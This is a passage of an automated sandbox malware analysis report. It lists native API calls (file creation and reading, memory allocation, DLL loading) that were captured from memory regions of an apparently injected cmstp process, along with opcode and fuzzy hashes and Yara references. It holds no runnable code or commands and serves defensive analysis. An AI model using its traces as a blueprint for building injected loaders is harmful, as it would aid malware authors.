35024 645e90 35020->35024 35025 644e50 LdrLoadDll 35020->35025 35021->35013 35022->35020 35023->35009 35026 645eb2 35024->35026 35028 644e50 LdrLoadDll 35024->35028 35025->35024 35027 645ed3 35026->35027 35029 644e50 LdrLoadDll 35026->35029 35030 645ef5 35027->35030 35031 644e50 LdrLoadDll 35027->35031 35028->35026 35029->35027 35032 645f17 35030->35032 35033 644e50 LdrLoadDll 35030->35033 35031->35030 35034 645f39 35032->35034 35036 644e50 LdrLoadDll 35032->35036 35033->35032 35035 645f5b 35034->35035 35037 644e50 LdrLoadDll 35034->35037 35038 645f7d 35035->35038 35039 644e50 LdrLoadDll 35035->35039 35036->35034 35037->35035 35040 645f9f 35038->35040 35041 644e50 LdrLoadDll 35038->35041 35039->35038 35042 645fc1 35040->35042 35044 644e50 LdrLoadDll 35040->35044 35041->35040 35043 645fe3 35042->35043 35045 644e50 LdrLoadDll 35042->35045 35043->34828 35044->35042 35045->35043 35047 6460c9 35046->35047 35048 646013 35046->35048 35047->34830 35048->35047 35049 64bfa0 2 API calls 35048->35049 35050 64603a 35049->35050 35050->35047 35051 64607c 35050->35051 35054 646092 35050->35054 35052 64bdd0 2 API calls 35051->35052 35053 646086 35052->35053 35053->34830 35055 64bdd0 2 API calls 35054->35055 35056 6460bd 35055->35056 35056->34830

                        Executed Functions

                        Function 0064A36B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00644BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00644BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0064A3BD
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        • Opcode ID: ba8f457fc1c587a04803f1fff820bc7ae5a6a46241081901ec85605f5cdd6379
                        • Instruction ID: ca23fe27175fcf7f6fcdb82dee6b9a86d6a28cbf6f8b80ac59ef04940f1935bb
                        • Opcode Fuzzy Hash: ba8f457fc1c587a04803f1fff820bc7ae5a6a46241081901ec85605f5cdd6379
                        • Instruction Fuzzy Hash: A401ABB6210208ABCB48DF88DC95EEB37A9AF8C754F158248FA0D97241D630E811CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A370, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00644BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00644BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0064A3BD
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: .z`
                        • API String ID: 823142352-1441809116
                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction ID: 77f47a06503d6b30b24a973a6bed2555bb9aa463c1645cacff87c10519b4ddea
                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                        • Instruction Fuzzy Hash: 0DF0BDB2200208ABCB48DF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A41A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jd,FFFFFFFF,?,rMd,?,00000000), ref: 0064A465
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: 1Jd
                        • API String ID: 2738559852-2594264187
                        • Opcode ID: fbc3a771d0564879691bc76b435da8cba29ad5ed35d80f7c62a20454a2c8b322
                        • Instruction ID: ea10c3a5d1385715784105b270ec9d402f08e7e35322246caa275741223c229e
                        • Opcode Fuzzy Hash: fbc3a771d0564879691bc76b435da8cba29ad5ed35d80f7c62a20454a2c8b322
                        • Instruction Fuzzy Hash: 0BF0F9B2200108ABDB14DF89DC81EEB77A9AF8C754F158248BE1DA7251C630EC11CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A420, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jd,FFFFFFFF,?,rMd,?,00000000), ref: 0064A465
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: 1Jd
                        • API String ID: 2738559852-2594264187
                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction ID: 8d546f49bc4993c29880a3f1d87763284b9cb42b9d7322cf3cff7c2be77b8b61
                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                        • Instruction Fuzzy Hash: ECF0A4B6200208ABDB14DF89DC81EEB77ADAF8C754F158248BE1D97251D630E8118BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A49A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtClose.NTDLL(PMd,?,?,00644D50,00000000,FFFFFFFF), ref: 0064A4C5
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID: PMd
                        • API String ID: 3535843008-2633327531
                        • Opcode ID: 7f6c727b373d88ea61b2ad4147df0fd39eb9834ab534ddd4784be3dbc8f7a4ce
                        • Instruction ID: 12a8adfe9364c25414d01b61199bf8e15abd7aeac7214a9ff334089c73a85014
                        • Opcode Fuzzy Hash: 7f6c727b373d88ea61b2ad4147df0fd39eb9834ab534ddd4784be3dbc8f7a4ce
                        • Instruction Fuzzy Hash: A7E0C2A944A2846BEB52FBF0A8C40C7BF91EF416183194A8EE8A847507C26492099792
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A4A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtClose.NTDLL(PMd,?,?,00644D50,00000000,FFFFFFFF), ref: 0064A4C5
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID: PMd
                        • API String ID: 3535843008-2633327531
                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction ID: 9e2eb5f62d2db26a8b2188e60aa50874ebfcfdd6d1dd607b9c70a6b939dcdb04
                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                        • Instruction Fuzzy Hash: 09D01776240214BBE710EBD8CC85EA77BADEF48760F154499BA189B242C530FA0086E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A54B, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00632D11,00002000,00003000,00000004), ref: 0064A589
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: 5f0cbc9f8c2dea21fdd80b2da96e16c22a7d55a45e7f1ee3d898d94fc073e72b
                        • Instruction ID: edec5b1c36a0cc3363bebf6df633366533cf44a9335615b49de4c197fd178c16
                        • Opcode Fuzzy Hash: 5f0cbc9f8c2dea21fdd80b2da96e16c22a7d55a45e7f1ee3d898d94fc073e72b
                        • Instruction Fuzzy Hash: 3DF015B6214209AFDB14DF89CC81EEB77ADAF8C354F158159FE5897351C630E811CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A550, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00632D11,00002000,00003000,00000004), ref: 0064A589
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction ID: 6146f6cfd6650cc4bd653fb7a26074e807df55331d30546b831eb52291f8aff8
                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                        • Instruction Fuzzy Hash: D0F015B6200208ABDB14DF89CC81EAB77ADAF88754F118148BE0897241C630F810CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 048195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1b1b7268c5e3e27f670278e5a7583dc764abe2835f2850c3eb685b93b76c0e96
                        • Instruction ID: a29e2196719eb33bd3db768f1cd9747971a87079e5211812ebb39e448a1f08b5
                        • Opcode Fuzzy Hash: 1b1b7268c5e3e27f670278e5a7583dc764abe2835f2850c3eb685b93b76c0e96
                        • Instruction Fuzzy Hash: 769002A120201003610571594514616444A97E0255BA1C521E60096A0DC565D8D57165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 0f1eec790b18c4fd3b1486500841f8df4103d0cfb2a7ae50ac23760528819c41
                        • Instruction ID: 4e1b60a2c1dad3b8e73c51067813af64e24f19c04c43b844eb89f55063e88234
                        • Opcode Fuzzy Hash: 0f1eec790b18c4fd3b1486500841f8df4103d0cfb2a7ae50ac23760528819c41
                        • Instruction Fuzzy Hash: E9900265211010032105A5590704507048697D53A53A1C521F600A660CD661D8A56161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819560, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 05199c18dddd907d99b4cb208deb830fd38aee52845bd2dc724ac5ec4f07a9b2
                        • Instruction ID: 9d93a97fb729b26d5784446a3801746cb4848300feef6bb81018c89f3587893c
                        • Opcode Fuzzy Hash: 05199c18dddd907d99b4cb208deb830fd38aee52845bd2dc724ac5ec4f07a9b2
                        • Instruction Fuzzy Hash: 05900265221010022145A559070450B0885A7D63A53E1C515F640B6A0CC661D8A96361
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 048196D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 3bfd5a877cc7729ad5b348e06a1fa5b3ee21b4cdc9d642b67825700635e77fd7
                        • Instruction ID: 16d66b66a9484bdedd1cc84b7572999de48fb47e3459b90b61d519f85d6592ff
                        • Opcode Fuzzy Hash: 3bfd5a877cc7729ad5b348e06a1fa5b3ee21b4cdc9d642b67825700635e77fd7
                        • Instruction Fuzzy Hash: 0690027120101842F10061594504B46044597E0355FA1C516A5119764D8655D8957561
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 048196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 921be2ff102d1fa58dcad72256339cd7826e624510ab75856d1d3e971ecef2b2
                        • Instruction ID: d1f50eb3be6df1b97d14649941eb263de2584539cb8861207323f787d86cfb7a
                        • Opcode Fuzzy Hash: 921be2ff102d1fa58dcad72256339cd7826e624510ab75856d1d3e971ecef2b2
                        • Instruction Fuzzy Hash: 4E90027120109802F1106159850474A044597D0355FA5C911A9419768D86D5D8D57161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819610, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c9c0d1f4946af550c139945647d0d831a3702347282d9ba40e9d64a4f24c0afa
                        • Instruction ID: ba86b4534b68440371ff334558916fa752ccc8cc4b673c1125624da61f1b1fc7
                        • Opcode Fuzzy Hash: c9c0d1f4946af550c139945647d0d831a3702347282d9ba40e9d64a4f24c0afa
                        • Instruction Fuzzy Hash: 0490027160501802F15071594514746044597D0355FA1C511A5019764D8795DA9976E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c98602790b3133c91203a1b9a74dcac1d06e957b8b4b8c81b83dcd4920588d2f
                        • Instruction ID: 2be44b35b1df27372c6e7d1de79dca4735d298ef5bce925eeb474b3ee7e16d46
                        • Opcode Fuzzy Hash: c98602790b3133c91203a1b9a74dcac1d06e957b8b4b8c81b83dcd4920588d2f
                        • Instruction Fuzzy Hash: 8890027120505842F14071594504A46045597D0359FA1C511A50597A4D9665DD99B6A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a27c762286cef368891c33d632d0a520b2d704ef1c7953c4701c82da7661dc63
                        • Instruction ID: 59c4ef3ecdd3fefd5c13a2b3b759699b515095dc8d6fd0c9329b9d6e4db3548d
                        • Opcode Fuzzy Hash: a27c762286cef368891c33d632d0a520b2d704ef1c7953c4701c82da7661dc63
                        • Instruction Fuzzy Hash: 5590027120101802F1807159450464A044597D1355FE1C515A501A764DCA55DA9D77E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e4aac227b9a5c617037c7c46fe753245e01e1fe3aad0435acc2d85558e141b9a
                        • Instruction ID: b51027e5e6b81f7a06662e3f8372de7de371a30b6080f3ced9121b834a333592
                        • Opcode Fuzzy Hash: e4aac227b9a5c617037c7c46fe753245e01e1fe3aad0435acc2d85558e141b9a
                        • Instruction Fuzzy Hash: CC90026921301002F1807159550860A044597D1256FE1D915A500A668CC955D8AD6361
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c204b91b851a173a8e66447c020f99331c45e8d063585dc8dcf3cea6c0683d9e
                        • Instruction ID: 0f25a1f1dd404b78007337b053179e6a1c8071631c5540160c4a4f5863401b5d
                        • Opcode Fuzzy Hash: c204b91b851a173a8e66447c020f99331c45e8d063585dc8dcf3cea6c0683d9e
                        • Instruction Fuzzy Hash: E490027131115402F11061598504706044597D1255FA1C911A5819668D86D5D8D57162
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 27d56ba680642ab174b4fd1ccd531f0233c54e6bac89c11a580a61f773f9ba26
                        • Instruction ID: 5c4e79f5649f14ada9ba8f30e3e0e2583ddd892aee00d4c01090353bb65a802b
                        • Opcode Fuzzy Hash: 27d56ba680642ab174b4fd1ccd531f0233c54e6bac89c11a580a61f773f9ba26
                        • Instruction Fuzzy Hash: BF90027120101402F10065995508646044597E0355FA1D511AA019665EC6A5D8D57171
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819770, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: decfad8769292527caa24f9c841d633495bc1284f73a5199b728bdcf0012db8a
                        • Instruction ID: 78efba6f2e34c15a7d32d9c1bae7c4da17d762a4ebe12884525dc80d456d60a9
                        • Opcode Fuzzy Hash: decfad8769292527caa24f9c841d633495bc1284f73a5199b728bdcf0012db8a
                        • Instruction Fuzzy Hash: B590026120505442F10065595508A06044597D0259FA1D511A60596A5DC675D895B171
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 0dac0c8b877e916affee5f4715fdcd016fc38b1cb5f2a099e733d1be50db54e5
                        • Instruction ID: e542be1b67597c83085e37f0b28c7ba4049bbf5e8b60fc7a9667be33234479a2
                        • Opcode Fuzzy Hash: 0dac0c8b877e916affee5f4715fdcd016fc38b1cb5f2a099e733d1be50db54e5
                        • Instruction Fuzzy Hash: 03900261242051527545B15945045074446A7E02957E1C512A6409A60C8566E89AE661
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 62c9b7317e1217bf9dfa6bf68e22abad5670f1b1d8d28667b01aa3cf25a18eeb
                        • Instruction ID: 9f3c592be1e7eb164b578ad31fb0c06d382d6eb2141fc11740b4249875900e56
                        • Opcode Fuzzy Hash: 62c9b7317e1217bf9dfa6bf68e22abad5670f1b1d8d28667b01aa3cf25a18eeb
                        • Instruction Fuzzy Hash: C290027120101413F11161594604707044997D0295FE1C912A5419668D9696D996B161
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 048199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c085167e933ca86e12b812cff255eddd2d623e57a7f070d5b14b85365a57864e
                        • Instruction ID: 94f8b7d4bb199b03ec19136eb3b5f8243726390970115104549fd6630bf6d93d
                        • Opcode Fuzzy Hash: c085167e933ca86e12b812cff255eddd2d623e57a7f070d5b14b85365a57864e
                        • Instruction Fuzzy Hash: AF9002A134101442F10061594514B060445D7E1355FA1C515E6059664D8659DC967166
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a7820f5650e896fb389ec1b8fea5d0acfe9f2c083cfde43f5b14e30b8dfd71ec
                        • Instruction ID: f7d279f56c5a63fc65732ab2e63f921764696d1cc1ccc0faf045e97779535bc0
                        • Opcode Fuzzy Hash: a7820f5650e896fb389ec1b8fea5d0acfe9f2c083cfde43f5b14e30b8dfd71ec
                        • Instruction Fuzzy Hash: 829002B120101402F14071594504746044597D0355FA1C511AA059664E8699DDD976A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 906129c82c5066c9fe2c4ede9f2db3c514189b2057dc3718b0a7d8f8de8c0c27
                        • Instruction ID: 7bec9b49c6d6b04cbbbd900776accfa9e9e1efd1d2317cf7f32a258c895c1a1e
                        • Opcode Fuzzy Hash: 906129c82c5066c9fe2c4ede9f2db3c514189b2057dc3718b0a7d8f8de8c0c27
